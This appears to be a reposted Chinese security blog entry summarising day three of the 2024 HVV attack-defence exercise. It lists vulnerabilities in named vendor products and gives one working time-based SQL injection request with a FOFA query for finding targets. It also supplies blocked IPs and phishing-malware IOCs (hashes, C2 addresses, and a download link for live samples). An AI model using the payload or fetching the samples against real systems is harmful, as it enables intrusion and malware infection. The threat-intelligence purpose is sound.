day3-HVV 再添新成员,八贱客登场:xx康、xx达、锐xx、科xx

admin
admin
admin
139127
文章
114
评论
2024年7月26日07:51:29评论116 views字数 6014阅读20分2秒阅读模式
不第后赋菊
唐·黄巢
待到秋来九月八,我花开后百花杀。
冲天香阵透长安,满城尽带黄金甲。

day3-HVV 再添新成员,八贱客登场:xx康、xx达、锐xx、科xx

随着2024HVV的进行,各大厂商的薄弱点都正逐渐显露出来。一起来看看最新钓鱼木马,以及新的一天又有哪些企业中招了!

一、红队攻击

1. 红队漏洞情况

【漏洞名称】:Apache RocketMQ 敏感数据泄露漏洞(暂未复现)

<漏洞描述>:受影响版本中存在敏感信息泄露漏洞,未经授权的用户可以在启用身份验证和授权功能的情况下获得敏感信息。拥有普通用户权限的攻击者可以通过特定接口窃取管理员账号和密码从而获得RocketMQ权限。

修复版本中,通过增加权限检查和验证,细化访问配置以修复漏洞。强烈建议将 RocketMQ ACL 升级为2.0。

<修复方案>:

将组件 org.apache.rocketmq:rocketmq-acl 升级至 5.3.0 及以上版本
将组件 org.apache.rocketmq:rocketmq-all 升级至 5.3.0 及以上版本
将组件 rocketmq 升级至 5.3.0 及以上版本

【漏洞名称】:微信公众平台-无限回调系统 -SQL

<漏洞描述>:微信公众平台无限回调系统 /user/ajax.php 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
网站图片:

day3-HVV 再添新成员,八贱客登场:xx康、xx达、锐xx、科xx

<fofa语法>:

body="mb-5 web-font-desc"

<漏洞复现>:

延迟5秒 payload:

POST /user/ajax.php?act=siteadd HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closesiteUrl=';select sleep(5)#'

<效果图>:

day3-HVV 再添新成员,八贱客登场:xx康、xx达、锐xx、科xx

【帆xx】漏洞列表:

(已复现)OA-反序列化RCE

(已复现)V11 0day sql注入至rce

【xx微】漏洞列表:

(已复现)e-cology 9 WorkflowServiceXml SQL注入漏洞

(已复现)E-Mobile移动管理平台installOperate.do存在SSRF漏洞

(已复现)e-cology 9 存在SSRF漏洞

【xx远】漏洞列表:

(已复现)OA fileUpload.do 前台文件上传绕过漏洞

【xx友】漏洞列表:

(已复现)NC querygoodsgridbycode存在SQL注入漏洞

(已复现)U8Cloud MonitorServlet 存在反序列化漏洞

(已复现)U8-CRM import任意文件上传漏洞

(已复现)NC-Cloud blobRefClassSearch接口存在FastJson反序列化漏洞

【xx康】漏洞列表:

综合安防管理平台detection前台远程命令执行

综合安防管理平台-反序列化RCE/SQL/文件上传

安全接入网关-任意文件读取

【xx达】漏洞列表:

Linkworks协同办公管理平台-XXE/SQL/文件上传

OA接口-XML实体注入/SQL/文件上传

【锐xx】漏洞列表:

校园网自助服务系统-目录遍历/SQL/任意文件读取

RG-UAC统一上网行为管理审计系统存在账号密码信息泄露

NBR路由器-文件上传

交换机 WEB 管理系统 EXCU_SHELL存在密码信息泄露漏洞

【科xx】漏洞列表:

一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞

一卡通管理系统get_kq_tj_today存在SQL注入漏洞

图书馆云平台存在SQL注入漏洞

二、蓝队防守

1.蓝队封禁IP列表

IOC 时间 情报标签 IP画像
85.122.195.73 2024-07-24 20:00 重保2024
8.218.147.18 2024-07-24 18:26 重保2024
47.102.135.184 2024-07-24 18:00 重保2024 IDC服务器
47.103.87.12 2024-07-24 18:00 重保2024
46.246.4.17 2024-07-24 18:00 重保2024
47.121.119.130 2024-07-24 18:00 重保2024 IDC服务器
47.97.111.157 2024-07-24 18:00 重保2024
47.91.14.8 2024-07-24 18:00 重保2024
47.96.78.5 2024-07-24 18:00 重保2024
47.99.195.123 2024-07-24 18:00 重保2024
52.250.30.171 2024-07-24 18:00 重保2024
52.171.219.111 2024-07-24 18:00 重保2024 IDC服务器
60.204.133.197 2024-07-24 18:00 重保2024 IDC服务器
60.205.226.146 2024-07-24 18:00 重保2024 IDC服务器

2.木马样本情报

***最新钓鱼木马:explorerLoader.exe

通过分析确认木马,无报毒,且具有数字签名

day3-HVV 再添新成员,八贱客登场:xx康、xx达、锐xx、科xx

day3-HVV 再添新成员,八贱客登场:xx康、xx达、锐xx、科xx

day3-HVV 再添新成员,八贱客登场:xx康、xx达、锐xx、科xx

day3-HVV 再添新成员,八贱客登场:xx康、xx达、锐xx、科xx

区分方法:
正规文件:
1、运行exe打开Windows资源管理器
2、文件大小x64 (4,912,480 字节)
非正规文件:
1、报错弹出蓝色窗口 但是已经隐藏运行
2、文件大小x64(5,000,000 字节以上)

医药商业报销.PIF

SHA256:d3cf90433e96a46b8aee6da223caf20271fd9f861a10d9f3b194bfc55f88163bMD5:d07206e06447557c67330a0f979d2b2f相关IP或域名:media.jinsixian.cn、safari.qifudeng.com样本地址:https://i.3001.net/uploads/Up_imgs/20240724-3dc493f8e6a6da03403923801d5d131c.zip【样本解压密码:threatbook】解压后可改名还原

2024 重点保障安全意识培训参会人员名单.zip

SHA256:c9d2dca72286c01e068b1995e3aa7772ff9686a492b89e8b8c7b0ecaf715cf40MD5:eb97e771dc4dd54c18553471d5fe3bbbC2:110.41.46.45:9111攻击手法:Rust、APC 调用CobaltStrike 木马
关于 2024 年公司财务调整的通知.exe
SHA256:d44f628b8e447249ef9ce8871350c52693c1f31cb126307be9f1b2c535053a4aMD5:248b44673cbb0384180fc62ca972f018来源:向日葵多协议 RDP 插件

关于 2024 攻防演练员工守则通知.exe

SHA256:bccd982dab220d22689cf81277789ef64b32f575a08f604e1a75da1d5d6aee10MD5:1c26667276b0f3f69ab55bf8b34fdd22C2:8.134.249.167:9099攻击手法:利用微信检测虚拟机后门木马
集团“星火计划”推荐学员参加选拔考试通知_docx.exe
SHA256:54a28a2bc66c4529aaf2c7b92d724f2a2943dcd12bb960f43e6d34cf90ace700MD5:7c29a8b9e872af42b5d92dc98f87a917C2:59.42.126.162:80来源:CobaltStrike 木马

徐加李简历.docx.exe

SHA256:d86db50d6990d345a1280991b757c770b661d94592a68a95c48b189b7ac4bf50MD5:b97e176e0ee5987ddfe98e056df343e9SHA1:3bdde433ae2579d8270110fa6281e2feca7

d6225

**金融(渠道经理).zip

SHA256:431d010c90b451c107d4160bb134ff072cf8c7076f16ab516faa2d31ef3c4759MD5:6330fab9ce531ce8943132272a3cb2a7相关IP域名/C2:mobile.static.apiproxy.cloud.360.net/mobile.static.apiproxy.cloud.360.net.cdn.dnsv1.com:443攻击手法:域前置CobaltStrike 木马

**会议(去除 30 分钟限制).exe

SHA256:ac962605550d120d4d38ba87a10c87027c7ccb3f430475c0104646183bc6f825MD5:2a04ff4412e48aabdc6fc073ae734cd2C2:154.12.83.210:54123攻击手法:资源段解密执行CobaltStrike 木马

**有限公司社会招聘报名登记表.exe

SHA256:02bbeb4d9d6f13fe1db44a0a2da572b1596d9ff59b79376e8afaeab0ba76a1d6MD5:09c7199b2bcd0d908a2b8d6867a1b240C2:2gwxrah28rj0z.cfc-execute.bj.baidubce.com攻击手法:垃圾代码耗时、RustCobaltStrike 木马

第三周周报.exe

SHA256:090a42171e42477dbcf0d02a4e901e8eb20cfde8c1765c9a67a84bafd256b2a4MD5:5cd7b3e9950c5169a5278bdee38438efC2:2gwxrah28rj0z.cfc-execute.bj.baidubce.com,downloadlog.oss-cn-chengdu.aliyuncs.com攻击手法:go 编译,从对象存储中获取到加密载荷CobaltStrike 木马

测试 tdp (2).zip

SHA256:13d7483a1f1a0b72aaa09ec985797556eeb402c893013a5bc08b706300c5bb3dMD5:e2eba605cf1b6822e1bd9cb06bd334dbC2:101.200.150.8:8089攻击手法:原版 CS CobaltStrike 木马

《关于集团网络资产评估管理有关事项的通知》.exe

SHA256:f1d4316a2c7bccf197ee6209389fe1ad7aef8a3b94aebae5548c8d1a05f036cdMD5:1b50d0cc313552072462327588f93a49C2:117.50.187.104:443来源:CobaltStrike 木马

对于**有限公司的异议书.exe

SHA256:7b9c13919a006396b8c60eeaa54bd5728ef70aa7b7890232f3752506243a3e66MD5:32a8cade2024195a71aeb1ebbd1c296fC2:175.178.226.246:33333来源:CobaltStrike 木马

artifact.exe

SHA256:c716ebfc4ae128c5d3b5a882683d7ca833bc4f339909cba4153425d4df765954MD5:9974ad03575c5a8bfae6f2bb787321eaC2:39.101.122.168:89来源:CobaltStrike 木马

***服务平台-存在弱口令漏洞.exe

SHA256:2358438e0c5931b12b2233d449354d3db21e17c350fdf171298c6665514bc655MD5:aef9c59cb030b7e4038ca9850c95f8a2C2:www.tencentcloud.site攻击手法:白加黑CobaltStrike 木马

杨*.rar

SHA256:7a5fdc1afaadd9d3673b922c45d65061b0ac01f9ffce6b0aec1126d843561f72MD5:6a0427a10e8e51b1db6c5670fe071f82相关IP域名:36.249.64.101:443(CDN),www.jinsixian.cn(Host)攻击手法:域前置CobaltStrike 木马

***服务平台-存在弱口令漏洞.exe

SHA256:2358438e0c5931b12b2233d449354d3db21e17c350fdf171298c6665514bc655MD5:aef9c59cb030b7e4038ca9850c95f8a2C2:www.tencentcloud.site攻击手法:白加黑CobaltStrike 木马

Desktop.exe

SHA256:ce19a3062a20d0f2b0bc2a774c11912214aba6e27a191ae31bb96bf6610ca765MD5:65c7f30fde67152da3176a8b55577accC2:101.132.194.179:8081来源:CobaltStrike 木马

edragent

SHA256:e3ef6b7090bba1ca1590f09538f2261d78dbfbea1435dd99b1e8e12e1636bbe5MD5:a7a2d23e0b1941876d043f0af6e71110C2:139.196.210.163:50010来源:CobaltStrike 木马

三、闲谈

太用力的人走不远,精力管理决定走多远……

和师傅们共勉

原文始发于微信公众号(oldhand):day3-HVV 再添新成员,八贱客登场:xx康、xx达、锐xx、科xx

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月26日07:51:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   day3-HVV 再添新成员,八贱客登场:xx康、xx达、锐xx、科xxhttps://cn-sec.com/archives/2998684.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息